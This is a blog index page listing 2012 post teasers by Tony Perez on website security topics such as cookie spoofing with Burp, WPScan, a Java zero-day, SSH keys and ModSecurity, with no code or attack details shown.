Spoofing an Admin’s Cookies Using Burp

By Tony Perez | November 5, 2012 |
Spoofing Cookies

Here is a quick little video I put together to show you how spoofing a users cookies works. This is not a real example, in most instances an application like Burp suite would be used in conjunction with a XSS attack or some equivalent attack. The objective is to get someone with higher privileges to…

Read More

Update WPSCAN using GIT on BackTrack 5R2

By Tony Perez | October 3, 2012 |
Website Security Expertise

So I have been playing with a number of tools lately and this was perhaps one of the easiest things I couldn’t figure out. Talk about having a “WTF” moment. If you’re curious, wpscan is a vulnerability scanner designed to pentest WordPress applications. It has a number of features that allow you to enumerate usernames, plugins, and…

Read More

Java Zero Day: Two Vulnerabilities

By Tony Perez | August 28, 2012 |
Security Warnings

Yesterday was an interesting one for the security world, it was a buzz over the new Java 0-Day and today is no different. It turns out however that it’s not just one (1) zero-day, it’s two and they were introduced back in July of 2011. We shared our initial thoughts on the vulnerability yesterday. Today…

Read More

Accessing Your Server via SSH Keys

By Tony Perez | August 12, 2012 |
Access Granted

The past couple of weeks I have found myself dabbling in a number of system / network centric tasks. In the process I have been configuring a number of servers and thinking through a number of initial tasks that need to be taken. From time to time I find myself compelled to take a few…

Read More

My New OSSEC HIDS Book

By Tony Perez | August 8, 2012 |
Security Book

Pretty excited, today I got my very own copy of the OSSEC Host-Based Intrusion Detection (HIDS) Guide in the mail. If you haven’t heard about it, it was developed a few years back and was founded by our founder at Sucuri, Daniel Cid. Its core features include:

Read More

Uninstall ModSecurity & WordPress Challenges

By Tony Perez | August 7, 2012 |
Uninstall Modsecurity WordPress Challenges

Ok, as simple as a post as this might appear I recently undertook an effort to install and configure ModSecurity on my little server. In the process I quickly learned a number of things, specifically that I needed to uninstall from my production box and push it over to a staging box. I’m not a…

Read More